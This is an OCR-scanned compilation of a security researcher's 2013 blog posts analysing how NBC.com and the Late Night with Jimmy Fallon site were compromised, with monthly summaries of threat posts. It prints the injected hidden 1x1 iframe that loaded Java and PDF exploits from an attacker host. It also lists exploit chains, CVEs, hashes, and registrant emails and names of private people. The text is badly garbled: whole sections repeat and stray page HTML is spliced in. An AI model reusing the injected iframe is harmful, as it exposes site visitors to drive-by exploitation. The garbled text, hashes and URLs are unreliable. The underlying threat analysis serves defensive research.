<a href="http://ww.nbe.com/community/” ttle ="Community”><ing s¢="http://ww.nibe.com/app2/img/default/scet/metaverse/1/0/6/3/1/4/2012_0810_DotCom _Coene 
</av> 
<div dass="side-nfo"> 

<h5 dass="tune4n">New, Tonight 8/7¢</nS> 

<h3 dass="title">Trida Helfer Guest Stars</h3> 

<p dass ="description” >The study group joins Abed on a trip to the Inspector Spacetime convention. Matt Lucas alto guest stars. </p> 

<div dass ="Wnks"> 

<a href= "http: /Awww.nbc.com/community video/?apl =true” dass ="tink-crde-arrow"> <span dass="icons-arrow-blue<irde”> Scar; </span> Watch Online</a> 


Who’s behind this campaign and can we connect this malicious activities to previously ana- 
lyzed malicious campaigns? But, of course. 


umaiskhan.com responds to 173.254.28.49, and on 2013-01-28 18:56:19 we know that 
another domain used in a Facebook Inc. themed campaign was also responding to 
the same IP, namely hxxp://shutterstars.com/wp-content/plugins/akismet/resume _face- 
book.html. The compromised legitimate host back then used to serve client-side exploits 
through hxxp://gotina.net/detects/sign on to _resume.php - 222.238.109.66 - Email: 
lockwr@rocketmail.com. 


Deja vu! We’ve already seen and profiled this malicious domain in the following assessment 
"[6]Fake ‘You’ve blocked/disabled your Facebook account’ themed emails serve client-side 
exploits and malware", indicating that both of these campaigns have been launched by the 
same cybercriminal/gang of cybercriminals. What’s also worth emphasizing on is that the 
same email (lockwr@rocketmail.com) used to register gonita.net was also profiled in the 
following assessment "[7]Fake ‘Verizon Wireless Statement” themed emails lead to Black 
Hole Exploit Kit", where it was used to register the Name Servers used in the campaign. 


Someone’s multi-tasking. That’s for sure. 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 


1. ftp: /7on, wikipedia org/ iki BG 
2. http: //blog. webroot . com/tag/facebook/ 
3, htap: //oleg. webroot con/ag/ verizon 
4. https: //swy.virustotal. con/en/£51e /Sb37 bee Ib{G9461613cS34447EabeT 7960 cceHT42a61N26417609e000iee/analyl 


5. 


8. http: //ddanchev.blogspot.com/ 
9. http: //twitter .com/danchodanche 


9.2.6 Dissecting NBC’s Exploits and Malware Serving Web Site Compromise 
(2013-02-21 22:03) 


The web site of the [1]National Broadcasting Company (NBC), NBC.com, is currently compro- 
mised, and is redirecting tens of thousands of legitimate users to multiple exploits serving 
and malware dropping malicious URLs. The campaign appears to have been launched by the 
same gang of cybercriminals that’s also been recently involved in impersonating [2]Facebook 
Inc. and [3]Verizon Wireless, in an attempt to trick their users/customers into clicking on 
links found in hundreds of thousands of spamvertised emails pretending to come from the 
companies. 


Let’s dissect the campaign, expose its structure, the dropped malware, and connect the 
dots on who's behind it. 


+ http://priceworldpublishing.com/aynk html 


» http://oimg.nbeuni.com/b/ss/nbcuglobal, nbcumetworkbu/ 1/H.24/s17651139747017AQB= 18nd = 1&t=21962F 196 2F201 3% 208%WSABWIASSW204BW2H4WAce=UTF-Hans = 
C2=Online&c3 = Homekc4 = NBC, com %20Front% 20D00r&c6 = itp 263A %2F% 2. nbc, com %2FRcB= TV 20Entertainment&c9=NBC%20NetworkkclO=Front%20D00r&ci f =F 
C40 =Undefinediv43 = hittp%3 A %2F% 2A .nbc.com Fe 2FRV45 = NBC 20Networkhv49 = Onlinesh 1 = TY 20Entertainment% 7ONBC%20Network% 7 CFront%20D00r&h2 = Onlin 
hp=NBRAQE=1 

+ http://oimg_nbouni.com/b/ss/nbouglobal nbounetworkbu/ 1/H.24/s17651139747017AQ8= 1&pecrr=truekividn = 2893234885 1D161F-400001 2DC00F9F7 1&Sundh = 1L&t= 21% 2F 
6 2Fwww.nibe.com%2F&cc= USDe&ch = webaiserver = werw.nbc.com&events = event6&c2 = Online&c3 = Homekc4 = NBC.com 20Front% 20D00r 06 = http% 3A % 2% 2Fww_NDC.com 
C12=NBC%20Network% 20% 7C% 20Front%20D00¢r&cl 3 = New&v32 Homekv36 « Front%20D00rkc40 = Undefined&kv4 3 «http 963A %2P 9 2Fwww.nbc,com% 2FRv4 5« NBC%20Net 
h2=Online%7CFront% 2000097 CHome% 7CNBC.com %20Front% 20D00r&h3 = www NDC.COMma&S = 1024x768Rc= 248) = 1.78&v=Yak= Yabw= 1256&bh=4295k&hp=NRAQE = 1 


« http://www. nbcudigitaladops.com/hosted/global.js 
+ http://www-nboudigitaladops.com/hosted/}s/nbc_com.js 
+ http://odn erxd.net/controttag?confid=Hhr_tggh 
+ http://apiservices.krxd.net/user_data/segments/3?pubid= 54983c83-88 10-4a6b- Off 1-8 1f73490e967&technographics = 1 &callback = Krux.ns._default.kxjsonp_userData 
+ hitp://secure.quantserve,com/quant. js 
+ http; //pheel quantserve.com/pixel;r= 386182341 ;a«p-Se)8k4/Szux46;fpan « 1;fpae PO-1743895828-1361462964538;ns«0;0e« 1;Je* 1;sr 1024x768x24 ence s;dst~ Ljet= 1361 
J;ogl «title. TV%20Network%20for% 20Primetime%252C%20Daytime% 20and% 201 ate% ZONIght%20T eleviston%20Shows %20- % 2ONBC% 200ffidal % 2Cdescription .Offidal%20 
[ver 252Enbo%252Ecom/%2Gmage http%IA//www%E25ZENbe% 25 ZEcom/assets/core/themnes/201 2/nbc/images/logos/logo-share%252Epag%*2Csite_name.NBC%252Ecom 
~ http://b.scorecardresearch com/beacon js7cl = 2&2 = 100000483 Act = &c5 = 8b = Ac S= 


+ hitp://secure-us.imrworkdwide.com/cgi-bin/m?d =us-S0354 lhkeg=O&cc= 1 Asi = http963A//www.nbc.com/8ap=&ts = compact&rnd= 1361462965167 
+ http://secure-us, imeworldwide.com/cgi-bin/m 17d =us-S0354 1h&cg=O&cc= 1&si = http%3A//www.nbc,com/8p=&ts =compact&rnd= 1361462965 167&ja= 1 
+ http://umaiskhan.com/ztuj. html 


Observed iFrames in rotation: 


hxxp://umaiskhan.com/znzd.html 
hxxp://umaiskhan.com/ztuj.html 
hxxp://priceworldpublishing.com/aynk.html 
hxxp://toplineops.com/mtnk.html 
hxxp://moi-npovye-sploett.com/qqqq/1.php 
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hxxp://www.jaylenosgarage.com/trucks/PHP/google.php 
hxxp://nikweinstein.com/cl/google.php 


Observed redirections leading to: 


hxxp://gonullersultani.net/znzd.htm 
hxxp://erabisnis.net/znzd.htm 
hxxp://electricianfortwayne.info/62.html 
hxxp://moi-npovye-sploett.com/cGeQcOwz1KPli/larktion.php 


Sample client-side exploitation chain for the first campaign: hxxp://toplineops.com/mtnk. html 
-> hxxp://electricianfortwayne.info/62.html -> hxxp://electricianfortwayne. info/987.pdf 


Upon successful client-side exploitation, the campaign drops [4]MD5: 
4e48ddc2a2481f9ff27113e6395160e1l - detected by 7 out of 46 antivirus scanners as 
Trojan-Spy.Win32.Zbot.jfgj. 
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Once executed the sample creates the "Xi3FVnelx" Mutex and phones back to: 
hxxp://eastsidetennisassociation.com/i.htm?jzd63FlJyFUfMyyf1Q8U9 - 74.220.215.229 


hxxp://envirsoft.com/n.htm?xWasESNrgozQ13QNRIPNCGTGhPAW16Q/67Bnj - 174.120.29.2 - 
Email: louis.bouchard@envirsoft.com 


hxxp://beautiesofcanada.com/s.htm?2dlYtfCwTLfFBZTL8TrY7btwJDVszO - 66.96.145.104 - 
Email: eddom@yahoo.com 


hxxp://magasin-shop.com/v.htm?ZPlkcqLyyHFRxHMhVxQN8HdfszymBrXxuy - 66.96.160.143 


hxxp://couche-transport.comlu.com/r.htm?Mb6kKF3mq5H8YxeVXYM9yOwK - 31.170.161.96 


Second redirection redirection chain for a sampled iFrame: hxxp://moi-npovye- 
sploett.com/qqqq/1.php -> hxxp://moi-npovye-sploett.com/cGeQcOwz1kKPl/larktion.php -> 
hxxp://moi-npovye-sploett.com/cGeQcOwz1kKPl/aflybing.php?esusvity=78528 O where it at- 
tempts to exploit [5]CVE-2010-0188. 


Malicious domains reconnaissance: 


umaiskhan.com - 173.254.28.49 - Email: chfaisal009@gmail.com - appears to be a com- 
promised site belonging to someone named "Azhar Mahmood", unless of course you want to 
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believe that Pakistan’s cyber warfare unit is behind the campaign, since this is the second 
time that | come across to this IP. Keep reading! 


priceworldpublishing.com - 174.122.45.74 - Email: info@sportsworkout.com 
electricianfortwayne.info - 173.201.92.1 - Email: mdkline65@yahoo.com 
gonullersultani.net - 72.167.2.128 - Email: gonullersultani@gmail.com 
erabisnis.net - 74.220.207.161 

moi-npovye-sploett.com - 130.185.157.102 - Email: josephhaddad829@yahoo.com 
jaylenosgarage.com - 80.239.148.217 


nikweinstein.com - 205.178.145.95 - Email: nikweinstein@hotmail.com 


mdkline65@yahoo.com is also known to have registered the following domains: 


dedirt.com 

dogsrit.com 

spiritualspice.us 
madamerufus.com 
herbalstatelegal.com 
myauditionsite.com 
injurylawyercleveland.info 
injurylawyerspringfieldmo.info 
injurylawyercolumbus. info 
injurylawyerindianapolis.info 
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<div dass="align-center” style ="height:0; overflowzhidden;"> 
<div dass ="advertisement ad728x90"> 
<script type ="textAawascint” >document.write(unescane (nbcAd728x90. replace ("728x90,970x66", "970x66") replace("728x90", "970x66"))); </script> 


<header dass"site”> 


<a href= "http://yeww.nibc.com/community/" ttle ="Community”><img ac="/app2/ma/default/scet/metaverse/ 1/2/1/8/7/6/com_top_helfer.jog” alt= "Trida Helfer Guest Stars 
<div dass="sidetogo"> 

<a href="http://vww.nbe.com/community/” ttle ="Community”><ing src ="http://vww.nbe.com/app2/img/default/scet/metaverse/1/0/6/3/1/4/2012_0810_DotCom_Coere 
</av> 
<div dass="side-nfo"> 

<h5 dass="tune4n">New, Tonight 8/7¢</nS> 

<h3 dass ="tite">Trida Helfer Guest Stars</h3> 

<p dass ="description” >The study group joins Abed on a trip to the Inspector Spacetime convention. Matt Lucas also guest stars. </p> 

<div dass ="Wnks"> 

<a href= "http: /fww.nbc.com/community video/?apl=true” dass ="tnk-crde-errow"> <span dass="icons-arrow-blue-<cirde">Scarr; </span> Watch Online</a> 


Who’s behind this campaign and can we connect this malicious activities to previously 
analyzed malicious campaigns? But, of course. 


umaiskhan.com responds to 173.254.28.49, and on 2013-01-28 18:56:19 we know that 
another domain used in a Facebook Inc. themed campaign was also responding to 
the same IP, namely hxxp://shutterstars.com/wp-content/plugins/akismet/resume _face- 
book.html. The compromised legitimate host back then used to serve client-side exploits 
through hxxp://gotina.net/detects/sign on to _resume.php - 222.238.109.66 - Email: 
lockwr@rocketmail.com. 


Deja vu! We’ve already seen and profiled this malicious domain in the following assessment 
"[6]Fake ‘You’ve blocked/disabled your Facebook account’ themed emails serve client-side 
exploits and malware", indicating that both of these campaigns have been launched by the 
same cybercriminal/gang of cybercriminals. What’s also worth emphasizing on is that the 
same email (lockwr@rocketmail.com) used to register gonita.net was also profiled in the 
following assessment "[7]Fake ‘Verizon Wireless Statement” themed emails lead to Black 
Hole Exploit Kit", where it was used to register the Name Servers used in the campaign. 


Someone’s multi-tasking. That’s for sure. 


Updates will be posted as soon as new developments take place. 
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1. http://en.wikipedia. org/wiki/NBC 

2. http://blog.webroot .com/tag/facebook 
3. http: //blog.webroot .com/tag/verizon/ 
4 


https: //www.virustotal.com/en/file/6b276bee21bf5946461e3c62f447b3be7 17 9e9cce4742a61b26417609ed001ee/analys 


9.3 March 


9.3.1 Summarizing Webroot’s Threat Blog Posts for February (2013-03-04 15:31) 


threat blog 


Products Support Communty& Resouces Partners About Webroot About the Bloggers 


Recap from RSA2013: Android 
Malware Expose 


Posted on F eteus 2013 by Rxnars Me 


weikirk © 4 Votes 


On Wednesday, February 27th, Webroot treat researchers Grayson Malbourne 
and Armarxio Orozco preserted at the RSA Corference in San Frarxisco 
Their topic, Android Malware Exposed — An in-depth Look at its Evolution, is 
an expansion on theit previous year's presertation, heghighting the severity of 
the Android malware growth. Focusing on the history of operating system 
releases and the diversity across the market, as wel al the threat vectors and 
behaviors in the evolution of Ardroid malware, the team has established strong 
preckchons for 2013 


Continue reading —- 


Toll pour Irends: Gi Facerook 1» (CJ twiter 2 os Googe +s [unten > ch Reost Ema |p) ttore 


Ube thes 


Posted in Ancrond, matware, Motte, Motee securty, Threat Research | Tagged Andreed, Blog, matware, i ie, ope PreaRcbons, pr ctecd 


Preats | Leave a commert 


How muc 1 does. it cost to buy 10,000 U.S.- 
ased malware-infected hosts? 


Posted on February 2 Dy Gdarechev 


Witte © 5 Votes 
By Dancho Danchev 


Earter thes morth, we profiled and exposed a newly launched underground service offering access to tens of | © Fotiow | 


a - a. e- sere uae 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for February, 
2013. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 
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01. [3]Fake Booking.com ‘Credit Card was not Accepted’ themed emails lead to malware 

02. [4]Fake FedEx ‘Tracking ID/Tracking Number/Tracking Detail’ themed emails lead to 
malware 

03. [5]‘Your Kindle e-book Amazon receipt’ themed emails lead to Black Hole Exploit Kit 

04. [6]New DIY HTTP-based botnet tool spotted in the wild 

05. [7]Mobile spammers release DIY phone number harvesting tool 

06. [8]New underground service offers access to thousands of malware-infected hosts 

07. [9]Targeted ‘phone ring flooding’ attacks as a service going mainstream 

08. [10]Fake ‘You've blocked/disabled your Facebook account’ themed emails serve client-side 
exploits and malware 

09. [11]Spamvertised IRS ‘Income Tax Refund Turned Down’ themed emails lead to Black Hole 
Exploit Kit 

10. [12]Malware propagates through localized Facebook Wall posts 

11. [13]Malicious ‘RE: Your Wire Transfer’ themed emails serve client-side exploits and 
malware 

12. [14]New underground E-shop offers access to hundreds of hacked PayPal accounts 

13. [15]Fake ‘Verizon Wireless Statement” themed emails lead to Black Hole Exploit Kit 

14. [16]DIY malware cryptor as a Web service spotted in the wild 

15. [17]Malicious ‘Data Processing Service’ ACH File ID themed emails serve client-side 
exploits and malware 

16. [18]How mobile spammers verify the validity of harvested phone numbers 

17. [19]How much does it cost to buy 10,000 U.S.-based malware-infected hosts? 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him 
[21]on Twitter. 


1. http://blog.webroot.com/ 
2. http://feeds2.feedburner. com/WebrootThreatBlog 
3. 


com/2013/02/04/fake-fedex-tracking-idtracking-numbertracking-detail-themed-emails-lea 
com/2013/02/05/your-kindle-e-book- amazon-receipt-themed-emails-lead-to-black-hole-exp 


com/2013/02/06/new-diy-http-based-botnet-tool-spotted-in-the-wild/ 
com/2013/02/07/mobile-spammers-release-diy-phone-number-harvesting-tool/ 


ttp://blog. webroot .com/2013/02/13/targeted-phone-ring-flooding-attacks-as-a-service-going-mainstream/ 
10. http://blog.webroot.com/2013/02/14/fake-youve-blockeddisabled-your-facebook-account-themed-emails-serve 
11. hbttp://blog.webroot.com/2013/02/15/spamvertised-irs- income-tax-refund-turned-down-themed-emails-lead-to 
black-hole-exploit-kit/ 
12. 


13. http://blog.webroot.com/2013/02/19/malicious-re-your-wire-transfer-themed-emails-serve-client-side-exp 


oits-and-malware/ 


14. http://blog. webroot .com/2013/02/20/new-underground-e-shop-offers-access-to-hundreds- of -hacked-paypal-ac 


20. http://ddanchev.blogspot.com/ 
21. http://twitter.com/danchodanche 


9.3.2 Dissecting NBC’s Late Night with Jimmy Fallon Web Site Compromise 
(2013-03-07 00:52) 


<script src="http://htmlSshim.googlecode.com/svn/trunk/htmlS. js"></script> 
<! [endif] --> 


<style type="text/css” media="screen"> 
@import "/css/common.css"; 
</style> 


<script language="JavaScript” type="text/javascript"> 
-{ 


function matchHeights(str) { 
var tallest = 0; 
jQuery(str).each(function() { 
tallest = Math.max(jQuery(this).height(), tallest); 
}); 
jQuery(str).each(function() { 
jQuery(this) .height(tallest); 
}); 
} 
Tf=-> 


<iframe srce"http://20-monkeys -b.com/exp/agencept .php?vialjack=339214" widthe1l height+l frameborder="0"></iframe>(crLF} 
<script language="JavaScript” type="text/javascript” src="/assets/}s/jquery/jquery.nbc.poll.js"></script> 
<script language="JavaScript" type="text/javascript”> 

<]-- 


jQuery(docunent).ready(function() { 
matchHeights(".left-column, .right-column, #additional-content"): 
): 


{/--> 
</script> 


<script src="/assets/core/plugins/video/jquery.video.js” type="text/javascript”></script> 


<script type="text/javascript*> 

function embedVideo(video,wap) { 

document .write("<div id=\"video-"+video+"\"></div>"); 
var player = ‘#video-'+video; 

var playerw = 512; 

var playerH = 318; 

var isFirstRun = true; 

var vidid = video; 

NBC(player) . video({ 

"id": vidId, 

“freewheel”: “Late_night_with_jimmy fallon_blog”. 


[1]Oops, they did it again! 


The official Web site (hxxp://www.latenightwithjimmyfallon.com ) of [2]NBC’s Late 
Night With Jimmy Fallon is currently [3]compromised/hacked and is automatically serving 
multiple Java exploits to its visitors through a tiny iFrame element embedded on the front 
page. According to [4]Google’s Safe Browsing Diagnostic page, the same malicious iFrame 
domain that affected the Web site, is also known to have affected 15 more domains. 
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Let’s dissect the campaign, expose the complete domains domains portfolio used in the 
Campaign, reproduce the malicious payload, and establish a direct connection between this 
Campaign, and a series of phishing campaigns that appear to have been launched by the 
same cybercriminal/gang of cybercriminals. 


Sample client-side exploitation chain: hxxp://20-monkeys-b.com/exp/agencept.php?vialjack=33921- 
- 144,135.8.182; 192.154.103.66 -> hxxp://20-monkeys-b.com/exp/tionjett.php 


Although the currently embedded iFrame domain is offline, we know that on 2013-03-06 
17:02:35 it used to respond to 192.154.103.66. We've got several malicious domains cur- 
rently parked at the same IP and responing, allowing us to obtain the malicious payload 
used in the campaign affecting NBC’s Web site. Upon further examination, the obtained 
malicious PDF used in the campaign, also attempts to connect to the initial iFrame domain 
(20-monkeys-b.com), proving that the domains are operated by the same cybercriminal/gang 
of cybercriminals. 


Sample exploitation chain for a currently active malicious domain respond- 
ing to 192.154.103.66: hxxp.://poople-huelytics.com/exp/agencept.php?vialjack=- 
694842 ->  hxxp://poople-huelytics.com/exp/addajapa/jurylamp.jar -> hxxp://poople- 
huelytics.com/exp/addajapa/ptlyable.jar -> hxxp://poople-huelytics.com/exp/jectrger.php 


Sample client-side exploits served: [5]CVE-2013-0431; [6]CVE-2012-1723; [7]CVE-2010-0188 


Sample detection rates for the reproduced malicious payload: 

test.pdf - [8]MD5: 013ed8ef6d92cfe337d9d82767f778da - detected by 10 out of 46 antivirus 
scanners as PDF:Exploit.PDF-JS.VU 

jurylamp.jar - [9]JMD5: dcba86395938737b058299b8e22b6d65 - detected by 7 out of 46 
antivirus scanners as Exploit:Java/CVE-2013-0431 

ptlyable.jar - [1O]JMD5: 2446aa6594fc7935ca13b130d4f67442 - detected by 6 out of 46 
antivirus scanners as HEUR:Exploit.Java.CVE-2012-1723.gen 


test. pdf drops MD5: 51311FDECCD8B6BC5059BE33E0046A27 and MD5: 
72B670F4582BC73CODO5FF506B51B8EB it then attempts to obtain the malicious payload 
from 20-monkeys-b.com/exp/senccute.php? (144.135.8.182) 


Responding to 192.154.103.66 are also the following malicious domains: 
snova-vdel-e.com 
mimemimikat.info 


Malicious domain names reconnaissance: 
20-monkeys-b.com - Email: haneslyndsey@yahoo.com 
poople-huelytics.com - Email: brianmyhalyk@yahoo.com 
snova-vdel-e.com - Email: guerin k@yahoo.com 
mimemimikat.info - Email: xbroshost@live.com 


More domains share the same exploitation directory structure (agencept.php?vialjack=) 
such as for instance: 

hxxp://upd.pes2020.com.ar/up/agencept.php?vialjack %3D219215 
hxxp://upd.typescript.com.ar/up/agencept.php?vialiack=219215 
hxxp://4ad32203.dyndns.info/agencept.php?vialjack=428181 
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hxxp://4ad34364.dyndns.info/agencept.php?vialjack=428181 
hxxp://4ad28306.dyndns.info/agencept.php?vialjack=428181 
hxxp://4ad23745.dyndns.info/agencept.php?vialjack=428181 
hxxp://4ad96968.dyndns.info/agencept.php?vialjack %3D428181 
hxxp://4ad21321.dyndns.info/agencept.php?vialjack=428181 


The same email (xbroshost@live.com) is also known to have registered the following 
phishing domains in the past: 

hxxp://www.realtorviewproperties.info/realtorjj/index.htm 
hxxp://www.usaindependentmerchids.com 

hxxp://www.usamerchandiseinc.com/ 

hxxp://www.blogconsciente.com/ secadmin/eLogin.php 


Although the cybercriminal/gang of cybercriminals behind this campaign applied basic 
OPSEC practices to it, the fact that the C &C/malicious payload acquisition strategy is largely 
centralized, (thankfully) indicates a critical flaw in their mode of thinking. 


This post has been reproduced from [11]Dancho Danchev’s blog. Follow him 
[12]Jon Twitter. 


. http: //ddanchev. blogspot .com/2013/02/dissecting-nbcs-exploits-and-malware.htm 
. http://en.wikipedia.org/wiki/Late_Night_with_Jimmy_Fallo: 
.google.com/interstitial?url=http://www.latenightwithjimmyfallon.com/ 


. google. com/safebrowsing/diagnostic?site=20-monkeys-b.com/&hl=e 


.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2012-172 


. http://cve.mitre.org/cgi-bin/cvename .cgi?name=CVE- 2010-0188 


| 
is/1362605170/ 

3. 
10. 
12. 


1 
2 
3 
4 
5. ; -mitre.org/cgi-bin/cvename.cgi?name=CVE- 2013-0431 
6 
7 
8 


9.3.3 Dissecting NBC’s Late Night with Jimmy Fallon Web Site Compromise 
(2013-03-07 00:52) 


<script src="http://htmlSshim.googlecode.com/svn/trunk/htmlS. js"></script> 
<! (endif) --> 


<style type="text/css” media="screen"> 
@import “/css/common.css"; 
</style> 


<script language="JavaScript” type="text/javascript"> 
To 


function matchHeights(str) { 
var tallest = 0; 
jQuery(str).each(function() { 
; tallest = Math.max(jQuery(this).height(), tallest); 
fe 
jQuery(str).each(function() { 
jQuery(this) .height(tallest); 
}); 
} 
//--> 
</script> 
<iframe srce“http://20-monkeys-b.com/exp/agencept .php?vialjack#339214" widthel height«1l framebordere"0"></1frame>{crLr) 


<script language="JavaScript” type="text/javascript” src="/assets/}s/jquery/jquery.nbc.poll.js"></script> 
<script language="JavaScript" type="text/javascript"> 
<!-- 


jQuery(docunent).ready(function() { 
; matchHeights(".left-column, .right-column, #additional-content"):; 
): 


[=> 
</script> 


<script src="/assets/core/plugins/video/jquery.video.js" type="text/javascript"></script> 


<script type="text/javascript"> 

function enbedVideo(video,wap) { 

document .write("<div id=\"video-"+video+"\"></div>"); 
var player = ‘#video-'+video; 

var playerw = 512; 

var playerH = 318; 

var isFirstRun = true; 

var vidId = video; 

NBC(player) . video({ 

"id": vidId, 

“freewheel”: “Late_night_with_jimmy fallon_blog”, 


[1]Oops, they did it again! 


The official Web site (hxxp://www.latenightwithjimmyfallon.com ) of [2]NBC’s Late 
Night With Jimmy Fallon is currently [3]compromised/hacked and is automatically serving 
multiple Java exploits to its visitors through a tiny iFrame element embedded on the front 
page. According to [4]Google’s Safe Browsing Diagnostic page, the same malicious iFrame 
domain that affected the Web site, is also known to have affected 15 more domains. 


Let’s dissect the campaign, expose the complete domains domains portfolio used in the 
campaign, reproduce the malicious payload, and establish a direct connection between this 
campaign, and a series of phishing campaigns that appear to have been launched by the 
same cybercriminal/gang of cybercriminals. 


Sample client-side exploitation chain: hxxp://20-monkeys-b.com/exp/agencept.php ?vialjack=33921- 
4157 


- 144,135.8.182; 192.154.103.66 -> hxxp://20-monkeys-b.com/exp/tionjett. php 


Although the currently embedded iFrame domain is offline, we know that on 2013-03-06 
17:02:35 it used to respond to 192.154.103.66. We've got several malicious domains cur- 
rently parked at the same IP and responing, allowing us to obtain the malicious payload 
used in the campaign affecting NBC’s Web site. Upon further examination, the obtained 
malicious PDF used in the campaign, also attempts to connect to the initial iFrame domain 
(20-monkeys-b.com), proving that the domains are operated by the same cybercriminal/gang 
of cybercriminals. 


Sample’ exploitation chain for a currently active malicious domain respond- 
ing to 192.154.103.66: hxxp://poople-huelytics.com/exp/agencept.php?vialjack=- 
694842 ->  hxxp://poople-huelytics.com/exp/addajapa/jurylamp.jar -> hxxp://poople- 
huelytics.com/exp/addajapa/ptlyable.jar -> hxxp://poople-huelytics.com/exp/jectrger.php 


Sample client-side exploits served: [5]CVE-2013-0431; [6]CVE-2012-1723; [7]CVE-2010- 
0188 


Sample detection rates for the reproduced malicious payload: 


test.pdf - [8]JMD5: 013ed8ef6d92cfe337d9d82767f778da - detected by 10 out of 46 an- 
tivirus scanners as PDF:Exploit.PDF-JS.VU 


jurylamp.jar - [9]MD5: dcba86395938737b058299b8e22b6d65 - detected by 7 out of 46 
antivirus scanners as Exploit:Java/CVE-2013-0431 


ptlyable.jar - [LO]JMD5: 2446aa6594fc7935ca13b130d4f67442 - detected by 6 out of 46 
antivirus scanners as HEUR:Exploit.Java.CVE-2012-1723.gen 


test.pdf drops MD5: 51311FDECCD8B6BC5059BE33E0046A27 and MD5: 
72B670F4582BC73CODO5FF506B51B8EB it then attempts to obtain the malicious payload 
from 20-monkeys-b.com/exp/senccute.php? (144.135.8.182) 


Responding to 192.154.103.66 are also the following malicious domains: 


snova-vdel-e.com 
mimemimikat.info 
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Malicious domain names reconnaissance: 
20-monkeys-b.com - Email: haneslyndsey@yahoo.com 
poople-huelytics.com - Email: brianmyhalyk@yahoo.com 
snova-vdel-e.com - Email: guerin k@yahoo.com 


mimemimikat.info - Email: xbroshost@live.com 


More domains share the same exploitation directory structure (agencept.php?vialjack=) 
such as for instance: 


hxxp://upd.pes2020.com.ar/up/agencept.php?vialjack %3D219215 
hxxp://upd.typescript.com.ar/up/agencept.php?vialjack=219215 
hxxp://4ad32203.dyndns.info/agencept.php?vialjack=428181 
hxxp://4ad34364.dyndns.info/agencept.php?vialjack=428181 
hxxp://4ad28306.dyndns.info/agencept. php ?vialjack=428181 
hxxp://4ad23745.dyndns.info/agencept. php ?vialjack=428181 
hxxp://4ad96968.dyndns.info/agencept.php?vialjack %3D428181 
hxxp://4ad21321.dyndns.info/agencept. php ?vialjack=428181 


The same email (xbroshost@live.com) is also known to have registered the following 
phishing domains in the past: 


hxxp://www. realtorviewproperties.info/realtorjj/index.htm 
hxxp://www. usaindependentmerchids.com 
hxxp://www.usamerchandiseinc.com/ 
hxxp://www.blogconsciente.com/ secadmin/eLogin.php 


Although the cybercriminal/gang of cybercriminals behind this campaign applied basic 
OPSEC practices to it, the fact that the C &C/malicious payload acquisition strategy is largely 
centralized, (thankfully) indicates a critical flaw in their mode of thinking. 


. http: //ddanchev. blogspot .com/2013/02/dissecting-nbcs-exploits-and-malware.htm 
: ://en.wikipedia.org/wiki/Late_Night_with_Jimmy_Fallo 
://wiw.google.com/interstitial?url=http://www.latenightwithjimmyfallon.com/ 


://www. google .com/safebrowsing/diagnostic?site=20-monkeys-b.com/&hl=e 


://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-172 


. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2010-0188 


. https://www.virustotal.com/en/file/3a85fdd707f3d040e1e92bc7 3b9ac5c202£69923821e1405039bc95b80e13033/analys 


1 
2 
3 
4 
2: ://cve mitre. org/cgi-bin/cvename .cgi?name=CVE-2013-0431 
6 
7 
8 


9. 
10. 


9.4 April 


9.4.1 Summarizing Webroot’s Threat Blog Posts for March (2013-04-01 21:37) 


threat blog 


Profxcts Suppot Communty& Resouces Partners About Webroot About the Eloggers 


DIY Java-based RAT (Remote Access Tool) spotted in search 
the wild 

wii © 3Vee8 HEGU 

By Dancho Danchev SecureAnywhere 


User Protection 


Wihule the authors/support teams of sorne of the market leading Web matware exploitation kits are competing on thes way . 
to be the first lit to introduce a new exploit on a mass scale, others, largely influenced by the re-emergence of the OfY (do-t- \ ONE license protects 
yourself) trend across the cybercrime ecosystern, continue relying on good old fastroned socal engineering attacks = 


“POFOUR cevices 


in tis post, FE profile a beneath-the-radar type of DIY Java-based botnet building tool, which is served through the usual U N MORE » 


unsigned, yel malicious Java applet 


More detass Continue reading ~ 


WEB THREAT REPORT: 
Tea pout treses Hj Facenooe Teeter Googe +1 [ij Uncean ;Reost gina + Moe 
== = Une 1S YOUR COMPANY EXPOSED? 
Be the frstto tke tis Get a compienertary copy of a mew = 


The following is a brief summary of all of my posts at Webroot’s Threat Blog for March, 2013. 
You can subscribe to [1]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [2]New DIY IRC-based DDoS bot spotted in the wild 

02. [3]Cybercriminals release new Java exploits centered exploit kit 

03. [4]Segmented Russian “spam leads” offered for sale 

04. [5]New DIY hacked email account content grabbing tool facilitates cyber espionage on a 
mass scale 

05. [6]New DIY unsigned malicious Java applet generating tool spotted in the wild 

06. [7]Commercial Steam ‘information harvester/mass group inviter’ could lead to targeted 
fraudulent campaigns 

07. [8]Fake BofA CashPro ‘Online Digital Certificate” themed emails lead to malware 

08. [9]Spamvertised BBB ‘Your Accreditation Terminated” themed emails lead to Black Hole 
Exploit Kit 

09. [10]New ZeuS source code based rootkit available for purchase on the underground 


4160 


market 

10. [11]Cybercriminals resume spamvertising ‘Re: Fwd: Wire Transfer’ themed emails, serve 
client-side exploits and malware 

11. [12]Cybercrime-friendly community branded HTTP/SMTP based keylogger spotted in the 
wild 

12. [13]Hacked PCs as ‘anonymization stepping-stones’ service operates in the open since 
2004 

13. [14]Fake ‘CNN Breaking News Alerts’ themed emails lead to Black Hole Exploit Kit 

14. [15]Spotted: cybercriminals working on new Western Union based ‘money mule manage- 
ment’ script 

15. [16]Malicious ‘BBC Daily Email’ Cyprus bailout themed emails lead to Black Hole Exploit 
Kit 

16. [17]‘ADP Payroll Invoice’ themed emails lead to malware 

17. [18]‘Terminated Wire Transfer Notification/ACH File ID” themed malicious campaigns lead 
to Black Hole Exploit Kit 

18. [19]New DIY RDP-based botnet generating tool leaks in the wild 

19. [20]A peek inside the EgyPack Web malware exploitation kit 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him 
[22]Jon Twitter. 


1. http://feeds2.feedburner . com/WebrootThreatBlog 


2. http://blog. webroot .com/2013/03/04/new-diy- irc-based-ddos-bot-spotted-in-the-wild/ 


3. http://blog. webroot .com/2013/03/05/cybercriminals-release-new- java-exploits-centered-exploit-kit/ 


4. http://blog. webroot . com/2013/03/06/segmented-russian- spam-leads- offered-for-sale/ 


